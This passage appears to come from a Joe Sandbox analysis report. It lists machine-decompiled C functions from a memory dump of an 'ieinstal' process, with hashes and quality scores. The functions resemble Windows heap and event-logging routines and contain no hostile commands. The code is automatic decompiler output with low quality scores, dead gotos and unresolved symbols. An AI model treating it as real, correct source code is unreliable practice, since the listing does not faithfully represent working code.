                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: aaba633ddfeb2c4c1209f2d9b0e4049d30e99f9d648ef640c3257875fbead679
                        • Instruction ID: 90edfc018d1fd9275d45edf0caa9c8e9eee0ab9a86dd4021ac48250e28abe295
                        • Opcode Fuzzy Hash: aaba633ddfeb2c4c1209f2d9b0e4049d30e99f9d648ef640c3257875fbead679
                        • Instruction Fuzzy Hash: FA018C74A00258AFCB00DFA9C545AAEB7F4FF08300F504169F805EB381EB30EA01CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDC1608, Relevance: .0, Instructions: 34COMMON
                        Download Yara Rule
                        C-Code - Quality: 46%
                        			E1EDC1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x1edfd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E1ED27D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E1ED4B640(E1ED49AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                        0x1edc1608
                        0x1edc1617
                        0x1edc161d
                        0x1edc1625
                        0x1edc1628
                        0x1edc162b
                        0x1edc1636
                        0x1edc1648
                        0x1edc1638
                        0x1edc1641
                        0x1edc1641
                        0x1edc1653
                        0x1edc1654
                        0x1edc1656
                        0x1edc165b
                        0x1edc166e

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8c01d3bdaf8fc708ffc0d7e3b8fd256abe69254f63b94f17b2e09b0d0e00d74f
                        • Instruction ID: 5c53f7e4959b285f2eb98b7a2596648d7953f96795b202bf7c6af5f65b6f390b
                        • Opcode Fuzzy Hash: 8c01d3bdaf8fc708ffc0d7e3b8fd256abe69254f63b94f17b2e09b0d0e00d74f
                        • Instruction Fuzzy Hash: C8F06D75A00268EFCB04DFA9C445EAEB7F4EF18300F444569E915EB381EA34E900CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED2C577, Relevance: .0, Instructions: 33COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED2C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E1ED2C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x1ece11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E1EDD88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                        0x1ed2c577
                        0x1ed2c57d
                        0x1ed2c581
                        0x1ed2c5b5
                        0x1ed2c5b9
                        0x1ed2c5ce
                        0x1ed2c5ce
                        0x1ed2c5ca
                        0x00000000
                        0x1ed2c5ca
                        0x1ed2c5c4
                        0x1ed2c5c8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed2c5ad
                        0x00000000
                        0x1ed2c5af

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9dd70a419866abe5b1611e04dd64f1b9cf29f06fbfcba5f198c9887121ca0d64
                        • Instruction ID: 5e74a6cffd8f01cd5c7492979d1e56670eaca3a5d4c1918c417d66a1d489e9ed
                        • Opcode Fuzzy Hash: 9dd70a419866abe5b1611e04dd64f1b9cf29f06fbfcba5f198c9887121ca0d64
                        • Instruction Fuzzy Hash: 7AF09AB29256D39FD32A87B4C000B027BEAAB05678FC58B76E44A87649C7A4DC80C260
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDD8D34, Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        C-Code - Quality: 43%
                        			E1EDD8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x1edfd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E1ED27D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E1ED4B640(E1ED49AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                        0x1edd8d34
                        0x1edd8d43
                        0x1edd8d4b
                        0x1edd8d4e
                        0x1edd8d52
                        0x1edd8d5c
                        0x1edd8d6e
                        0x1edd8d5e
                        0x1edd8d67
                        0x1edd8d67
                        0x1edd8d79
                        0x1edd8d7a
                        0x1edd8d7c
                        0x1edd8d81
                        0x1edd8d94

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6fb6aa849a198f0ba7ba15a2f51f2be1d0b02ac50c6b01d66e09d718747b700b
                        • Instruction ID: be2d0d1c75717a2891ea641106097b5ab65f01d60cc0bb59e53f585af3bb071d
                        • Opcode Fuzzy Hash: 6fb6aa849a198f0ba7ba15a2f51f2be1d0b02ac50c6b01d66e09d718747b700b
                        • Instruction Fuzzy Hash: 7DF09074A047489FCB04DBB9D442B6EB7B4AF14600F508599E906AB2C1DA34E9018764
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED4927A, Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        C-Code - Quality: 54%
                        			E1ED4927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E1ED4FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E1ED492C6(_t11, _t14);
				}
				return _t11;
			}





                        0x1ed49295
                        0x1ed49299
                        0x1ed4929f
                        0x1ed492aa
                        0x1ed492ad
                        0x1ed492ae
                        0x1ed492af
                        0x1ed492b0
                        0x1ed492b4
                        0x1ed492bb
                        0x1ed492bb
                        0x1ed492c5

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                        • Instruction ID: 055cd3bedf34c52114308c81d1f78af8b696761c08288f0f0db797428c73f663
                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                        • Instruction Fuzzy Hash: 52E022323406812BE7118F0ACCC4F4337ADEF92721F184578B9001E282CBE6ED098BB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDC2073, Relevance: .0, Instructions: 32COMMON
                        Download Yara Rule
                        C-Code - Quality: 94%
                        			E1EDC2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E1EDBFD22(__ecx);
				_t19 =  *0x1edf849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1edf8748; // 0x0
					if(__eflags <= 0) {
						E1EDC1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1edf8724 & 0x00000004;
							if(( *0x1edf8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1edf8724; // 0x0
					return E1EDB8DF1(__ebx, 0xc0000374, 0x1edf5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                        0x1edc2076
                        0x1edc2078
                        0x1edc207d
                        0x1edc2083
                        0x1edc20a4
                        0x1edc20aa
                        0x1edc20ac
                        0x1edc20b7
                        0x1edc20ba
                        0x1edc20bc
                        0x1edc20c9
                        0x1edc20c9
                        0x1edc20d0
                        0x1edc20d2
                        0x00000000
                        0x1edc20d2
                        0x1edc20be
                        0x1edc20c3
                        0x1edc20c5
                        0x1edc20c7
                        0x00000000
                        0x00000000
                        0x1edc20c7
                        0x1edc20bc
                        0x1edc20d4
                        0x1edc2085
                        0x1edc2085
                        0x1edc20a3
                        0x1edc20a3

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bbd8270f3230513245f754ca937ac5cdd02b6dbd44096a3cc2ced9e725b1d736
                        • Instruction ID: 1032190c0c46080148046c99fe7c4292169c3c2ab75e5691717d171da8eb27db
                        • Opcode Fuzzy Hash: bbd8270f3230513245f754ca937ac5cdd02b6dbd44096a3cc2ced9e725b1d736
                        • Instruction Fuzzy Hash: 3AF0272E8219F58BCF12CB2561633C1EF92CB46990F0A1A8FE85617244C535D883DA21
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED04F2E, Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED04F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E1EDD88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E1ED2C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1ece1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                        0x1ed04f2e
                        0x1ed04f34
                        0x1ed04f38
                        0x1ed60b85
                        0x1ed60b85
                        0x1ed60b89
                        0x1ed60b9a
                        0x1ed60b9a
                        0x1ed60b9f
                        0x00000000
                        0x1ed60b9f
                        0x1ed60b94
                        0x1ed60b98
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed60b98
                        0x1ed04f3e
                        0x1ed04f48
                        0x00000000
                        0x1ed04f6e
                        0x00000000
                        0x1ed04f70

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a21c39454570b561b09865caa9e6528457216cc91fcdda170f77397473d6a220
                        • Instruction ID: a4da223a60f96634a63dc638b7fdc3959034687c290851003c8152a9795618b1
                        • Opcode Fuzzy Hash: a21c39454570b561b09865caa9e6528457216cc91fcdda170f77397473d6a220
                        • Instruction Fuzzy Hash: 64F0E2369256C58FD371C72CC1A0B02B7F6AB09778F418774D40687964C724EC84C654
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDD8CD6, Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 36%
                        			E1EDD8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1edfd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E1ED27D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E1ED4B640(E1ED49AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                        0x1edd8ce5
                        0x1edd8ced
                        0x1edd8cf0
                        0x1edd8cfb
                        0x1edd8d0d
                        0x1edd8cfd
                        0x1edd8d06
                        0x1edd8d06
                        0x1edd8d18
                        0x1edd8d19
                        0x1edd8d1b
                        0x1edd8d20
                        0x1edd8d33

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 70c18328ecdc08d0e0c7b2b20097fa637bac3148364f27609193f0a9b9707acd
                        • Instruction ID: 35aa2084b1dca4f69ed1f62cb90bf43f1e4700eb6b61bb79f081de1ae5c107bb
                        • Opcode Fuzzy Hash: 70c18328ecdc08d0e0c7b2b20097fa637bac3148364f27609193f0a9b9707acd
                        • Instruction Fuzzy Hash: 73F0E9749042489FCB00CBB9D446F5E77B4EF14200F500659F515EB2C0DA34E900C754
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED2746D, Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E1ED2746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E1ED1EB70(__ecx, 0x1edf79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E1ED495D0();
							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                        0x1ed2746d
                        0x1ed2746d
                        0x1ed2746d
                        0x1ed27471
                        0x1ed27488
                        0x1ed6f92d
                        0x1ed2748e
                        0x1ed27491
                        0x1ed27495
                        0x1ed6f937
                        0x1ed6f93a
                        0x1ed6f94e
                        0x1ed6f953
                        0x1ed6f956
                        0x1ed6f956
                        0x1ed27495
                        0x00000000
                        0x1ed27488
                        0x1ed27473
                        0x1ed27478
                        0x1ed2747d
                        0x1ed27481
                        0x00000000
                        0x1ed27481
                        0x1ed2747d
                        0x1ed2747a
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2bb1bf4ccf39c310ac78fe7c79095638ce58b00605190d6f5de4a5073202f006
                        • Instruction ID: 6056325fea61615cfba5588ca6518e0ff4eb05dbf9ed522a63dfbce10d04ac76
                        • Opcode Fuzzy Hash: 2bb1bf4ccf39c310ac78fe7c79095638ce58b00605190d6f5de4a5073202f006
                        • Instruction Fuzzy Hash: 85F0BE38D541C7EFDB218B68C840BA97BA2AF0421CF920776D890AB1A0E724E8028795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDD8B58, Relevance: .0, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 36%
                        			E1EDD8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x1edfd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E1ED27D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E1ED4B640(E1ED49AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                        0x1edd8b67
                        0x1edd8b6f
                        0x1edd8b72
                        0x1edd8b7d
                        0x1edd8b8f
                        0x1edd8b7f
                        0x1edd8b88
                        0x1edd8b88
                        0x1edd8b9a
                        0x1edd8b9b
                        0x1edd8b9d
                        0x1edd8ba2
                        0x1edd8bb5

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c6439c5662549146f08f79e7398d22b3fe0b1c3a01e0926b49de694b4701204a
                        • Instruction ID: 2408a6a1dc67f58629fea3a2f4c14bccb7432a5dad7c81235eb3b9f6288b748d
                        • Opcode Fuzzy Hash: c6439c5662549146f08f79e7398d22b3fe0b1c3a01e0926b49de694b4701204a
                        • Instruction Fuzzy Hash: 32F082B4A04259ABDB00DBB9D916F6EB7B4FF04300F550559BA05EB3C1EB74E900C7A8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED3A44B, Relevance: .0, Instructions: 29COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED3A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1edf7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E1ED4FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                        0x1ed3a44b
                        0x1ed3a453
                        0x1ed3a472
                        0x1ed3a476
                        0x00000000
                        0x1ed3a493
                        0x1ed3a47a
                        0x1ed3a47f
                        0x1ed3a486
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4a79365269d9c69d7dd5cd1a876f8e15bc94d23d69c711952a0c86bb3c34d7d4
                        • Instruction ID: f838051458d60ea1b28362ff6b81ebd60c5eba7187db16adb3b0295b732fe60e
                        • Opcode Fuzzy Hash: 4a79365269d9c69d7dd5cd1a876f8e15bc94d23d69c711952a0c86bb3c34d7d4
                        • Instruction Fuzzy Hash: C3E092B2B01421ABD2118B18EC00F9673ADDBE5656F1A4539E948C7254D628ED02C7E1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED0F358, Relevance: .0, Instructions: 28COMMON
                        Download Yara Rule
                        C-Code - Quality: 79%
                        			E1ED0F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E1ED3F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L1ED24620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                        0x1ed0f35d
                        0x1ed0f361
                        0x1ed0f367
                        0x1ed0f372
                        0x1ed0f38c
                        0x1ed0f38c
                        0x1ed0f394

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                        • Instruction ID: 7b90a0d8abae9616b475ccf628b7eeaba9a5db6c689a47aaae7d766b00157300
                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                        • Instruction Fuzzy Hash: 2DE06832A00218BFCB2087C88D01F9ABBBCDF44A61F100691F904D7090C5209D40C2D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED1FF60, Relevance: .0, Instructions: 22COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1ED1FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x1ece11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E1EDD88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E1ED20050(_t14);
				}
			}










                        0x1ed1ff66
                        0x1ed1ff6b
                        0x00000000
                        0x1ed1ff8f
                        0x00000000
                        0x1ed1ff8f

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b9dcb11ed76eebc5b7479c6aa95dbad2bb4a522c4c1bde85a3a624232d4e4fc8
                        • Instruction ID: eca48a8e4447921e15f1967ed3e4bd8c686b2e90aa05508f9332cb9468ef7e83
                        • Opcode Fuzzy Hash: b9dcb11ed76eebc5b7479c6aa95dbad2bb4a522c4c1bde85a3a624232d4e4fc8
                        • Instruction Fuzzy Hash: BEE0DFB52192C69FD324CB52F150F097B9ABF62721F1A879DF00A4F541C762E8C8C216
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1EDBD380, Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E1EDBD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L1ED0E8B0(__ecx, _a4, 0xfff);
					L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                        0x1edbd38a
                        0x1edbd39b
                        0x1edbd3b1
                        0x00000000
                        0x1edbd3b6
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                        • Instruction ID: a6a17ed8361b64618c999754e0a4c2216c88a474712951605998247cf72fa59e
                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                        • Instruction Fuzzy Hash: DCE0C235280685BBDB224E44CC00F697B16DB907A0F104531FE095B7D1C775EC91D6E5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED941E8, Relevance: .0, Instructions: 21COMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E1ED941E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x1ede08f0);
				_t5 = E1ED5D08C(__ebx, __edi, __esi);
				if( *0x1edf87ec == 0) {
					E1ED1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x1edf87ec == 0) {
						 *0x1edf87f0 = 0x1edf87ec;
						 *0x1edf87ec = 0x1edf87ec;
						 *0x1edf87e8 = 0x1edf87e4;
						 *0x1edf87e4 = 0x1edf87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L1ED94248();
				}
				return E1ED5D0D1(_t5);
			}





                        0x1ed941e8
                        0x1ed941ea
                        0x1ed941ef
                        0x1ed941fb
                        0x1ed94206
                        0x1ed9420b
                        0x1ed94216
                        0x1ed9421d
                        0x1ed94222
                        0x1ed9422c
